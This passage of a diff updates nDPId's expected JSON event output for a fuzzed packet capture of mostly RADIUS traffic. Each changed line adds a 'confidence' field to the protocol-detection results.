MyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGlgAADghEQYAAAAAGhUAADghEg9JbnZhbGtkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCFCBgCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00716{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":50,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":9472,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528996997052,"pkt":"ABRP+4rqcNuYVcUnJQBFAAE4+6JAAPwRV9jG4hk1Cgyqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
@@ -97,7 +97,7 @@
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":52,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2050}
 00718{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":58,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528997012338,"pkt":"ABRP+4rqcNuYVcUnCABFAIEw++ZAAPwRV5TG4hk1CgxAHgcUchABHA0JAicBFBsdKAWbpXDSR2MuOEvDRI4aCwAAV8gbBVNQQxpuAAABNxA0owm4HCG6PU2XNAkv\/vzDOB0KCSSyhii6vunR59O76CIKGOYjAfl7PUhdXq\/+IyUA1AERNOgzhBq9cBFTORk8iq5zOGawlRK5SmrzC9CE14BmLSTx9+rzUr5gcK7nljeTYDH3Q7JtAU4wMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNCUALm12YzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNDg0L2YwOjc5OjYwOmQxOjdkOjM3LzIxNVkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJln13lrCrLxGDT3fIxBMmg"}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":58,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1528996825583,"flow_last_seen":1528996832079,"flow_idle_time":180000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1528997019398,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1528996825583,"flow_last_seen":1528996832079,"flow_idle_time":180000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1528997019398,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01288{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":63,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"ts_msec":1528997023243,"pkt":"AAAMB6xAABRP+4rqCAAHAALbIOZAAP8RAAAKDEAexuIZNXIQBxQC1gAAASoCn1lLG5tNeGgoWBAiZw18BtkaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICVZXSVNQUjEwGgkAADghDQMyNwZbIqSfATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00179{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":63,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997023501,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -106,19 +106,19 @@
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":71,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":19456}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1528997046661,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528997046661,"pkt":"ABRP+4rqcNuYVcUnCABFAACl\/GdAAPwRV57G4hk1SgxAHgcUchAAkRD9CzAAiXzLxBwubl1wwfS6AWnHLCcBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NCU6OTA6MDk6NWYvMjE2Tw4BAAAMFwwAAAwBf\/xQEsknsuWEL1cn0K6nAa77dv0="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997046661,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528997046798,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01320{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1528997046798,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"ts_msec":1528997046798,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIO1AAP8RAAAKDEAexuJNNXIQBxQClwAAATECjwe2IRDkqP0tMlR6xA\/iWasaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgsAADghDQM0NwZbIqS2ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtJQAtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxn2FjMDAwMDAwYmE5ZmE0MjI1YiwgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjE2BAbsFAEQIA5WWldDOlRlc3RMSWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TwoCAAAIFwwAMRoUAABXyAcOVqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528997046798,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528997046798,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997050187,"flow_last_seen":1528997050187,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997050187,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01383{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1528997050187,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997050187,"pkt":"AAAMB6xAABRP+4rqCABFAALbtOlAAP8RAAAKDEAexuIZPnIQBxQCxwAAATICv5GU17VEoPcQLX8EgXuXJCsaCgAAV8gOBFVTGgwAAFfIDQZ3aWYlAA8AAFfICQlXSVNQUjEwGgkAQzghDQM1NwZbIqS6ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6byUAaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmE4ZmE0MjI1YiwgNWIyMmE0OWYvZTA6NWYaNDU6OTA6MDk6NWYvMjE2BAasFAEQIA5WWldDMlRlc3RMxWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xBbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFdhoQAABXyAIKU3RhbmRhcmQaEAAAV4wLClRlYnQgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBElAHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOGkTFzQwLjgwNDg4Mk4tNzQuMTAyAjM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4YRYPU3RhZGltbURpqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997050187,"flow_last_seen":1528997050187,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997050187,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997050187,"flow_last_seen":1528997050187,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997050187,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00630{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1528997050255,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528997050255,"pkt":"ABRP+0\/qcNuYVcUnCABFAACl\/HNAAPwRV4nG4hk+CgxAHgcUchAIkVSXCzIAiQCjJQAe3VyUfsXAQgu9DVIBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjE2Tw4BAAAMFwwAAAwBf\/xQEnsk2TyvRrElAGPaQu1TGoc="}
 01320{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1528997050383,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"ts_msec":1528997050383,"pkt":"AAAMD6xAABRP+4rqCABFAAKrtOpAAP8RAAAKDEAexuIZPnIQBxQClwAAATMCj3XAts8pgtMIwokQgS0z6XQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AJQBbCQlXSVNQUjEwGgkAADghDQM1NwZbIqS6ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjR4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJAStPdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmE5ZmE0MjI1YiwgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjFiBAasFAEQSg5WWldDMlBlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAElBBgAAAAZRBDU2TwoCAAAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIGRFWWlcgQzIgVGVzdCBMYWIaCyAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDKYAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMzAyODM5VxoMAAA4IRQGAAABAhpYAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASp1PPp6fzyd7h983G\/yoSHA=="}
 00570{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":82,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"ts_msec":1528997050448,"pkt":"ABRP+4rqcNuYVcUnCABFAADA\/Hc3APwRV2rG4hk+CgxAHgcUchAArOXvAzMApAK5\/vK2WJ8qPE8W1U8CkZoBNTAzMTE0ODAyODE1MDE1ODlAd2xhbg5tbmM0ODAu2WNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZSUANWY6NDU6OTA6MDk6tWYXMjE2EiIzMjc2NGFTdWJzY3JpYmVyIG5vdCBwcm92aXdpb25lZE8HwQEABwBQEvaqqqqqqqqqqqqqqqqqqqo="}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":82,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172}
-00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":83,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1528996996259,"flow_last_seen":1528997046860,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":10961,"flow_avg_l4_payload_len":456,"midstream":0,"ts_msec":1528997104586,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":83,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528997104586,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":83,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1528996996259,"flow_last_seen":1528997046860,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":10961,"flow_avg_l4_payload_len":456,"midstream":0,"ts_msec":1528997104586,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":83,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1528997104586,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00601{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":83,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990566,"flow_last_seen":1528996990566,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997104586,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01288{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":83,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"ts_msec":1528997104586,"pkt":"AAAMB6xAABRP+4rqCABFAALbIO5WAP8RAAAKDEAexuYZNXIQBxQCJQAAATQCv+aa7vRvKm2pJNxjASYcFmMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqTwATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwXVZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdGZzZTNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmJmMGE0MjI1YiwgNTQyMmE0ZjAvZjA6Nzk6NjA6ZDFCN2Q6MzcvMjE4BAasFAEQIA5WWtdDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAHdBBgAAAAZRBDU2TzoCAQA4ATAzMRI0ODAwNzM2MzgQNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3ThbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgxrALTIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VyXmAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPUnRhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASLJHJyWe9KDtsOLUZd3kW6Q=="}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":83,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711}
@@ -137,101 +137,101 @@
